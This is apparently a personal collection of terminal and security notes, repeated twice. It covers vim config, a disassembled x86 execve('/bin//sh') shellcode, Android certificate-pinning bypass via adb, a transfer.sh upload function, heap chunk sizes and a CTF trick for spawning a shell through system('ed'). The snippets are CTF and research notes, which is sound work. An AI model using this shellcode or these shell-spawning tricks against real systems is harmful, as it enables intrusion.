nongiach

## denite vim
" Denite {{{
" Change file_rec command.
call denite#custom#var('file_rec', 'command',
      \ ['ag', '--follow', '--nocolor', '--nogroup', '--ignore=*.pyc', '-g', ''])

" Change mappings.
call denite#custom#map(
      \ 'insert',
      \ 'K',
      \ '<denite:move_to_next_line>',

## shellcoding
https://i.imgur.com/L7CYCkp.png
https://github.com/plasma-disassembler/plasma
@pentest_swissky :  https://twitter.com/pentest_swissky/status/1009545955069386758

tweetips$ echo -en "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" > /tmp/a
tweetips$ plasma --raw x86 /tmp/a
function _start (raw) {
    0x0: eax = 0
    0x2: push eax
    0x3: push 1752379183 "//sh"

## docker
A wet interface to manager docker
sudo docker run -d -p 9000:9000 -v /var/run/docker.sock:/docker.sock microbox/dockerui

http://microbox.io/

## arm_now todo
write an exploit for this CVE: https://www.exploit-db.com/exploits/43718/
Write an ida plugins to debug embeded https://dougallj.wordpress.com/2018/06/04/writing-a-hex-rays-plugin-vmx-intrinsics/
Describe usecases like here: https://github.com/illera88/Ponce

pwntools integration
IDA plugin


Add original function arguments to exall
and document exall callbacks

## upload file from shell
transfer ()
{
    if [ $# -eq 0 ]; then
        echo "No arguments specified. Usage:\necho transfer /tmp/test.md\ncat /tmp/test.md | transfer test.md";
        return 1;
    fi;
    tmpfile=$( mktemp -t transferXXX );
    if tty -s; then
        basefile=$(basename "$1" | sed -e 's/[^a-zA-Z0-9._-]/-/g');
        curl --progress-bar --upload-file "$1" "https://transfer.sh/$basefile" >> $tmpfile;

## android unpinning
wget http://SERVER:8282/cert -O cacert.der
openssl x509 -inform DER -in cacert.der -out cacert.pem
rm cacert.der
CERT="$(openssl x509 -inform PEM -subject_hash_old -in cacert.pem |head -1).0"
adb connect SERVER:5555
adb root
adb connect SERVER:5555
adb remount
adb push cacert.pem "/system/etc/security/cacerts/${CERT}"
adb shell chmod 644 "/system/etc/security/cacerts/${CERT}"

## 0 malloc real_chunk_size
./a.out | grep '00 '
malloc(240), in metadata => 257, real_chunk_size => 0x100 | usable_size => 0xf8
malloc(496), in metadata => 513, real_chunk_size => 0x200 | usable_size => 0x1f8
malloc(752), in metadata => 769, real_chunk_size => 0x300 | usable_size => 0x2f8
malloc(1008), in metadata => 1025, real_chunk_size => 0x400 | usable_size => 0x3f8
malloc(1264), in metadata => 1281, real_chunk_size => 0x500 | usable_size => 0x4f8
malloc(1520), in metadata => 1537, real_chunk_size => 0x600 | usable_size => 0x5f8
malloc(1776), in metadata => 1793, real_chunk_size => 0x700 | usable_size => 0x6f8
malloc(2032), in metadata => 2049, real_chunk_size => 0x800 | usable_size => 0x7f8
malloc(2288), in metadata => 2305, real_chunk_size => 0x900 | usable_size => 0x8f8

## clize demo
#!/usr/bin/python3

# https://github.com/epsy/clize
# pip install clize
import clize

def exploit(target, motivation=42):
    print(target, motivation)

def fuzz(target, tool="afl", *, share=False):

## trick to spawn shell
@moyix
Another CTF trick: if you need a string for system() that will get you a shell, consider the humble "ed". It supports running shell commands (!), and b/c of English past tense is often available as a suffix of some existing string in the binary, e.g.: "File transfer complet𝙚𝙙"

@chaign_c
It also works with "ex", "vi", "sh", "vim", "gdb", "ftp", "php", "irb" I don't have ed on archlinux. ls /bin/???? if you want more.

## get all network interfaces except lo
grep is better than awk for cross system
ip a | grep -o ':.*: ' | grep -v ': lo: ' | grep -o '[^ :]*'

ip a | awk '!/: lo: / && match($0, ": (.*): ", a) {print a[1]}'
	" Denite {{{
	" Change file_rec command.
	call denite#custom#var('file_rec', 'command',
	\ ['ag', '--follow', '--nocolor', '--nogroup', '--ignore=*.pyc', '-g', ''])

	" Change mappings.
	call denite#custom#map(
	\ 'insert',
	\ 'K',
	\ '<denite:move_to_next_line>',
	https://i.imgur.com/L7CYCkp.png
	https://github.com/plasma-disassembler/plasma
	@pentest_swissky : https://twitter.com/pentest_swissky/status/1009545955069386758

	tweetips$ echo -en "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" > /tmp/a
	tweetips$ plasma --raw x86 /tmp/a
	function _start (raw) {
	0x0: eax = 0
	0x2: push eax
	0x3: push 1752379183 "//sh"
	A wet interface to manager docker
	sudo docker run -d -p 9000:9000 -v /var/run/docker.sock:/docker.sock microbox/dockerui

	http://microbox.io/
	write an exploit for this CVE: https://www.exploit-db.com/exploits/43718/
	Write an ida plugins to debug embeded https://dougallj.wordpress.com/2018/06/04/writing-a-hex-rays-plugin-vmx-intrinsics/
	Describe usecases like here: https://github.com/illera88/Ponce

	pwntools integration
	IDA plugin


	Add original function arguments to exall
	and document exall callbacks
	transfer ()
	{
	if [ $# -eq 0 ]; then
	echo "No arguments specified. Usage:\necho transfer /tmp/test.md\ncat /tmp/test.md \| transfer test.md";
	return 1;
	fi;
	tmpfile=$( mktemp -t transferXXX );
	if tty -s; then
	basefile=$(basename "$1" \| sed -e 's/[^a-zA-Z0-9._-]/-/g');
	curl --progress-bar --upload-file "$1" "https://transfer.sh/$basefile" >> $tmpfile;
	wget http://SERVER:8282/cert -O cacert.der
	openssl x509 -inform DER -in cacert.der -out cacert.pem
	rm cacert.der
	CERT="$(openssl x509 -inform PEM -subject_hash_old -in cacert.pem \|head -1).0"
	adb connect SERVER:5555
	adb root
	adb connect SERVER:5555
	adb remount
	adb push cacert.pem "/system/etc/security/cacerts/${CERT}"
	adb shell chmod 644 "/system/etc/security/cacerts/${CERT}"
	./a.out \| grep '00 '
	malloc(240), in metadata => 257, real_chunk_size => 0x100 \| usable_size => 0xf8
	malloc(496), in metadata => 513, real_chunk_size => 0x200 \| usable_size => 0x1f8
	malloc(752), in metadata => 769, real_chunk_size => 0x300 \| usable_size => 0x2f8
	malloc(1008), in metadata => 1025, real_chunk_size => 0x400 \| usable_size => 0x3f8
	malloc(1264), in metadata => 1281, real_chunk_size => 0x500 \| usable_size => 0x4f8
	malloc(1520), in metadata => 1537, real_chunk_size => 0x600 \| usable_size => 0x5f8
	malloc(1776), in metadata => 1793, real_chunk_size => 0x700 \| usable_size => 0x6f8
	malloc(2032), in metadata => 2049, real_chunk_size => 0x800 \| usable_size => 0x7f8
	malloc(2288), in metadata => 2305, real_chunk_size => 0x900 \| usable_size => 0x8f8
	#!/usr/bin/python3

	# https://github.com/epsy/clize
	# pip install clize
	import clize

	def exploit(target, motivation=42):
	print(target, motivation)

	def fuzz(target, tool="afl", *, share=False):
	@moyix
	Another CTF trick: if you need a string for system() that will get you a shell, consider the humble "ed". It supports running shell commands (!), and b/c of English past tense is often available as a suffix of some existing string in the binary, e.g.: "File transfer complet𝙚𝙙"

	@chaign_c
	It also works with "ex", "vi", "sh", "vim", "gdb", "ftp", "php", "irb" I don't have ed on archlinux. ls /bin/???? if you want more.
	grep is better than awk for cross system
	ip a \| grep -o ':.: ' \| grep -v ': lo: ' \| grep -o '[^ :]'

	ip a \| awk '!/: lo: / && match($0, ": (.*): ", a) {print a[1]}'